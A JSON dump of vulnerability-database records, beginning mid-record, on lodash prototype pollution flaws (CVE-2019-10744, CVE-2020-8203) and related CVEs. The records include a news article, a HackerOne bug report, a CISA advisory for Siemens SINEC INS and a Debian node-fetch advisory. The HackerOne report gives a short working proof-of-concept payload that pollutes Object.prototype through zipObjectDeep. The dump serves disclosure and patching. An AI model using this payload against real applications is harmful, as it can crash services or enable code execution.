"NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10744"], "modified": "2020-12-09T13:00:38", "id": "0F9925B5-8753-571B-9551-BFB1CC2BE8F2", "href": "", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-12T11:44:52", "description": "# lodash v4.17.15\n\n[Site](https://lodash.com/) |\n[Docs](https://...", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.4, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-12-01T09:45:48", "type": "githubexploit", "title": "Exploit for Prototype Pollution in Lodash", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8203"], "modified": "2022-05-12T10:13:20", "id": "E56192E7-FC31-58F7-A982-BEA41F95D172", "href": "", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "privateArea": 1}], "thn": [{"lastseen": "2022-05-09T12:39:55", "description": "[](<https://thehackernews.com/images/-mzBypNKvfsw/XSS7YgXYNMI/AAAAAAAA0ZU/GC0w0FVL8Y4UV5A2h1V78BvEaDnNOuZ2QCLcBGAs/s728-e100/lodash-prototype-pollution.png>)\n\nLodash, a popular npm library used by more than 4 million projects on GitHub alone, is affected by a high severity security vulnerability that could allow attackers to compromise the security of affected services using the library and their respective user base. \n \n[Lodash](<https://lodash.com/>) is a JavaScript library that contains tools to simplify programming with strings, numbers, arrays, functions, and objects, helping programmers write and maintain their JavaScript code more efficiently. \n \nLiran Tal, a developer advocate at open-source security platform Snyk, recently published details and proof-of-concept exploit of a high-severity prototype pollution security vulnerability that affects all versions of lodash, including the latest version 4.17.11. \n \nThe vulnerability, assigned as [CVE-2019-10744](<https://snyk.io/blog/snyk-research-team-discovers-severe-prototype-pollution-security-vulnerabilities-affecting-all-versions-of-lodash/>), potentially affects a large number of frontend projects due to the popularity of lodash that is being downloaded at a rate of more than 80 million times per month. \n \nPrototype pollution is a vulnerability that enables attackers to modify a web application's JavaScript object prototype, which is like a variable that can be used to store multiple values based on a predefined structure. \n\n\n[](<https://thehackernews.com/images/-ITvSl_DGa7c/XSS4tDjRw1I/AAAAAAAA0ZI/4EjFAqUZ4xk-ZVYQRSYjuBmZ2sUStddoQCLcBGAs/s728-e100/lodash-prototype-pollution.png>)\n\nThese structures and default values are called prototypes that prevent an application from hashing when no values are set. \n \nHowever, if an attacker manages to inject properties into existing JavaScript language construct prototypes and manipulate these attributes to overwrite or pollute, it could affect how the application processes JavaScript objects through the prototype chain, leading to a denial of service issue or a remote code execution vulnerability. \n \nAccording to Tal, the function \"defaultsDeep\" in the Lodash library could be tricked into adding or modifying properties of Object.prototype using a constructor payload, which could result in crashing the web application or altering its behavior, depending upon the affected use-case. \n \nIt should be noted that exploiting prototype pollution flaws is not easy and require in-depth knowledge on how each targeted web application works. \n \nThe researcher responsible reported this vulnerability to John Dalton, maintainer of Lodash, and proposed fixes (pull requests [1](<https://github.com/lodash/lodash/pull/4336>) and [2](<https://github.com/lodash/lodash/pull/4337>)) that will be included in the next version of the library, expected to be released very soon. \n \nIf your project also uses on lodash, you are recommended to immediately update your library as soon as the official patch releases or manually apply the fixes.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2019-07-09T16:06:00", "type": "thn", "title": "Unpatched Prototype Pollution Flaw Affects All Versions of Popular Lodash Library", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10744"], "modified": "2019-07-09T16:08:54", "id": "THN:101765240E90491A3C0627908D36E708", "href": "https://thehackernews.com/2019/07/lodash-prototype-pollution.html", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "hackerone": [{"lastseen": "2023-02-03T02:37:39", "bounty": 250.0, "description": "I would like to report a prototype pollution vulnerability in lodash.\nIt allows an attacker to inject properties on Object.prototype\n\nModule\nmodule name: lodash\nversion: 4.17.15\nnpm page: https://www.npmjs.com/package/lodash\n\nModule Description\nThe Lodash library exported as Node.js modules.\n\nModule Stats\n25,228,177 downloads in the last week\n\nVulnerability\nVulnerability Description\nThis is a similar with this vulnerability: https://hackerone.com/reports/380873\n\nThe functions merge, mergeWith, and defaultsDeep can be tricked into adding or modifying properties of the Object prototype. These properties will be present on all objects.\n\nSteps To Reproduce:\nCraft an object by \"zipObjectDeep\" function of lodash\n\nconst _ = require('lodash');\n_.zipObjectDeep(['__proto__.z'],[123])\nconsole.log(z) // 123\n\n## Impact\n\nVariable. Server crash or the server becoming unable to respond to all request is garanteed, but more significant impact like remote code execution can be achieved in some cases.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.4, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2019-10-11T12:06:20", "type": "hackerone", "title": "Node.js third-party modules: Prototype pollution attack (lodash)", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8203"], "modified": "2020-04-27T22:14:18", "id": "H1:712065", "href": "https://hackerone.com/reports/712065", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "ics": [{"lastseen": "2023-03-31T17:07:35", "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 8.8**\n * **ATTENTION:** Exploitable remotely/Low attack complexity \n * **Vendor:** Siemens\n * **Equipment:** SINEC INS\n * **Vulnerabilities:** Improper Input Validation, Integer Overflow or Wraparound, Uncontrolled Resource Consumption, Command Injection, Inadequate Encryption Strength, Missing Encryption of Sensitive Data, Improper Restriction of Operations Within the Bounds of a Memory Buffer, Exposure of Private Personal Information to an Unauthorized Actor, Open Redirect, Improper Resource Shutdown or Release, Server-Side Request Forgery (SSRF)\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of these vulnerabilities could allow an attacker to cause a denial-of-service condition, disclose sensitive data, or violate the system integrity. \n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following versions of Siemens SINEC INS, a software tool for central network services, are affected:\n\n * Siemens SINEC INS: All versions prior to V1.0 SP2\n\n### 3.2 VULNERABILITY OVERVIEW\n\n#### 3.2.1 [UNCONTROLLED RESOURCE CONSUMPTION CWE-400](<https://cwe.mitre.org/data/definitions/400.html>)\n\nThe UAParser.js package, versions prior to 0.7.23, are vulnerable to regular expression denial-of-service in multiple RegExes.\n\n[CVE-2020-7793](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-7793>) has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H>)).\n\n#### 3.2.2 [INTEGER OVERFLOW OR WRAPAROUND CWE-190](<https://cwe.mitre.org/data/definitions/190.html>)\n\nThe JSON-C application programming interface (API) documentation through version 0.14 has an integer overflow and out-of-bounds write via a large JSON file.\n\n[CVE-2020-12762](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-12762>) has been assigned to this vulnerability. A CVSS v3 base score of 7.8 has been calculated; the CVSS vector string is ([AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.3 [SERVER-SIDE REQUEST FORGERY (SSRF) CWE-918](<https://cwe.mitre.org/data/definitions/918.html>)\n\nThe Axios NPM package, version 0.21.0, contains an SSRF vulnerability that could allow an attacker to bypass a proxy by providing a URL that responds with a redirect to a restricted host or IP address.\n\n[CVE-2020-28168](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28168>) has been assigned to this vulnerability. A CVSS v3 base score of 5.9 has been calculated; the CVSS vector string is ([AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N>)).\n\n#### 3.2.4 [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)\n\nLodash versions prior to 4.17.21 are vulnerable to regular expression denial-of-service via the toNumber, trim, and trimEnd functions.\n\n[CVE-2020-28500](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28500>) has been assigned to this vulnerability. A CVSS v3 base score of 5.3 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L>)).\n\n#### 3.2.5 [ UNCONTROLLED RESOURCE CONSUMPTION CWE-400](<https://cwe.mitre.org/data/definitions/400.html>)\n\nAxios is vulnerable to inefficient regular expression complexity.\n\n[CVE-2021-3749](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3749>) has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H>)).\n\n#### 3.2.6 [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)\n\nTLS 1.3 default curves are impacted by EC algorithms affected by a carry propagation bug in the MIPS32 and MIPS64 squaring procedure.\n\n[CVE-2021-4160](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-4160>) has been assigned to this vulnerability. A CVSS v3 base score of 5.9 has been calculated; the CVSS vector string is ([AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N>)).\n\n#### 3.2.7 [ IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN A COMMAND (\u2019COMMAND INJECTION\u2019) CWE-77](<https://cwe.mitre.org/data/definitions/77.html>)\n\nLodash versions prior to 4.17.21 are vulnerable to command injection via the template function.\n\n[CVE-2021-23337](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-23337>) has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.8 [INADEQUATE ENCRYPTION STRENGTH CWE-326](<https://cwe.mitre.org/data/definitions/326.html>)\n\nOpenSSL 1.0.2 servers from version 1.0.2s to 1.0.2x are affected by inverted logic regarding padding checks. Implementation of this padding check inverted the logic so that the connection attempt is accepted if the padding is present and rejected if it is absent. Resultantly, a server will accept a connection if a version rollback attack has occurred, and the server will erroneously reject a connection if a normal SSLv2 connection attempt is made\n\n[CVE-2021-23839](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-23839>) has been assigned to this vulnerability. A CVSS v3 base score of 3.7 has been calculated; the CVSS vector string is ([AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N>)).\n\n#### 3.2.9 [MISSING ENCRYPTION OF SENSITIVE DATA CWE-311](<https://cwe.mitre.org/data/definitions/311.html>)\n\nUpon attempting to create a unique hash value based on the issuer and serial number data contained within an X509 certificate, the OpenSSL public API function \u201cX509_issuer_and_serial_hash()\u201dfails to correctly handle any errors that may occur while parsing the issuer field. This may result in a NULL pointer deref and a crash leading to a denial-of-service condition.\n\n[CVE-2021-23841](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-23841>) has been assigned to this vulnerability. A CVSS v3 base score of 5.9 has been calculated; the CVSS vector string is ([AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H>)).\n\n#### 3.2.10 [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)\n\nThe following versions of BIND, 9.11.0 -&gt; 9.11.36 9.12.0 -&gt; 9.16.26 9.17.0 -&gt; 9.18.0, the following versions of BIND Supported Preview Editions, 9.11.4-S1 -&gt; 9.11.36-S1 9.16.8-S1 -&gt; 9.16.26-S1, and versions of BIND 9 \u2013prior to 9.1.0, including Supported Preview Editions, are potentially vulnerable. However, these versions have not been tested as they are EOL. An attacker could contaminate the cache with incorrect records, resulting in queries being made to the wrong servers and false information being.\n\n[CVE-2021-25220](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-25220>) has been assigned to this vulnerability. A CVSS v3 base score of 8.6 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N>)).\n\n#### 3.2.11 [IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFER CWE-119](<https://cwe.mitre.org/data/definitions/119.html>)\n\nThe affected products contain the third-party component, ISC DHCP. This component introduces a vulnerability when used as a DHCP client or server when storing and reading DHCP lease information. An attacker could exploit this vulnerability to affect the availability of the DHCP client, availability of the server, or the confidentiality of the data. Other potential exploits include impacts to the integrity of the device through a buffer overflow or a remote-code execution.\n\n[CVE-2021-25217](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-25217>) has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is ([AV:A/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H>)).\n\n#### 3.2.12 [ EXPOSURE OF PRIVATE PERSONAL INFORMATION TO AN UNAUTHORIZED ACTOR CWE-359](<https://cwe.mitre.org/data/definitions/395.html>)\n\nThe follow-redirect could potentially expose private personal information to an attacker.\n\n[CVE-2022-0155](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-0155>) has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N>)).\n\n#### 3.2.13 [URL REDIRECTION TO UNTRUSTED SITE (\u2019OPEN REDIRECT\u2019) CWE-601](<https://cwe.mitre.org/data/definitions/601.html>)\n\nThe node-fetch could potentially expose sensitive information to an attacker.\n\n[CVE-2022-0235](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-0235>) has been assigned to this vulnerability. A CVSS v3 base score of 6.1 has been assigned; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N>)).\n\n#### 3.2.14 [IMPROPER RESOURCE SHUTDOWN OR RELEASE CWE-404](<https://cwe.mitre.org/data/definitions/404.html>)\n\nThe following versions of BIND, 9.16.11 -&gt; 9.16.26, 9.17.0 -&gt; 9.18.0, and the following versions of BIND Supported Preview Edition, 9.16.11-S1 -&gt; 9.16.26-S1, are affected. Specifically crafted TCP streams can suspend BIND connections in a CLOSE_WAIT status for an indefinite time, even after the client has terminated the connection.\n\n[CVE-2022-0396](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-0396>) has been assigned to this vulnerability. A CVSS v3 base score of 5.3 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L>)).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Multiple\n * **COUNTRIES/AREAS DEPLOYED:** Worldwide\n * **COMPANY HEADQUARTERS LOCATION:** Germany\n\n### 3.4 RESEARCHER\n\nSiemens reported these vulnerabilities to CISA.\n\n## 4\\. MITIGATIONS\n\nSiemens recommends updating to [V1.0 SP2](<https://support.industry.siemens.com/cs/document/109812610/sinec-ins-v1-0-service-pack-2-software-\\(including-10-node-demo\\)-download-?lc=en-ww>) or later.\n\nAs a general security measure, Siemens strongly recommends protecting network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends configuring the environment according to [Siemens\u2019 operational guidelines for industrial security](<https://cert-portal.siemens.com/operational-guidelines-industrial-security.pdf>), and to follow the recommendations in the product manuals.\n\nAdditional information on industrial security by Siemens can be found [here](<https://new.siemens.com/global/en/products/automation/topic-areas/industrial-security.html>).\n\nFor more information about these issues, see Siemens\u2019 security advisory SSA-637483 [HTML ](<https://cert-portal.siemens.com/productcert/html/ssa-637483.html>)[CSAF](<https://cert-portal.siemens.com/productcert/csaf/ssa-637483.json>).\n\nCISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure they are [not accessible from the Internet](<https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-10-301-01>).\n * Locate control system networks and remote devices behind firewalls and isolate them from business networks.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as its connected devices.\n\nCISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nCISA also provides a section for [control systems security recommended practices](<https://us-cert.cisa.gov/ics/Recommended-Practices>) on the ICS webpage at [cisa.gov/ics](<https://cisa.gov/ics>). Several CISA products detailing cyber defense best practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the ICS webpage at [cisa.gov/ics](<https://cisa.gov/ics>) in the technical information paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://www.cisa.gov/uscert/ics/tips/ICS-TIP-12-146-01B>).\n\nOrganizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.\n\nNo known public exploits specifically target these vulnerabilities.\n\n### Vendor\n\nSiemens\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-15T12:00:00", "type": "ics", "title": "Siemens SINEC INS", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-12762", "CVE-2020-28168", "CVE-2020-28500", "CVE-2020-7793", "CVE-2021-23337", "CVE-2021-23839", "CVE-2021-23841", "CVE-2021-25217", "CVE-2021-25220", "CVE-2021-3749", "CVE-2021-4160", "CVE-2022-0155", "CVE-2022-0235", "CVE-2022-0396"], "modified": "2022-09-15T12:00:00", "id": "ICSA-22-258-05", "href": "https://www.cisa.gov/news-events/ics-advisories/icsa-22-258-05", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "debian": [{"lastseen": "2023-01-21T22:06:48", "description": "-------------------------------------------------------------------------\nDebian LTS Advisory DLA-3222-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Guilhem Moulin\nDecember 05, 2022 https://wiki.debian.org/LTS\n-------------------------------------------------------------------------\n\nPackage : node-fetch\nVersion : 1.7.3-1+deb10u1\nCVE ID : CVE-2022-0235\n\nranjit-git discovered an information leak vulnerability in node-fetch, a\nNode.js module exposing a window.fetch compatible API on Node.js\nruntime: the module was not honoring the same-origin-policy and upon\nfollowing a redirect would leak cookies to the the target URL.\n\nFor Debian 10 buster, this problem has been fixed in version\n1.7.3-1+deb10u1.\n\nWe recommend that you upgrade your node-fetch packages.\n\nFor the detailed security status of node-fetch please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/node-fetch\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\nAttachment:\nsignature.asc\nDescription: PGP signature\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2022-12-05T00:22:45", "type": "debian", "title": "[SECURITY] [DLA 3222-1] node-fetch security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0235"], "modified": "2022-12-05T00:22:45", "id": "DEBIAN:DLA-3222-1:083ED", "href": "https://lists.debian.org/debian-lts-announce/2022/12/msg00007.html", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}]}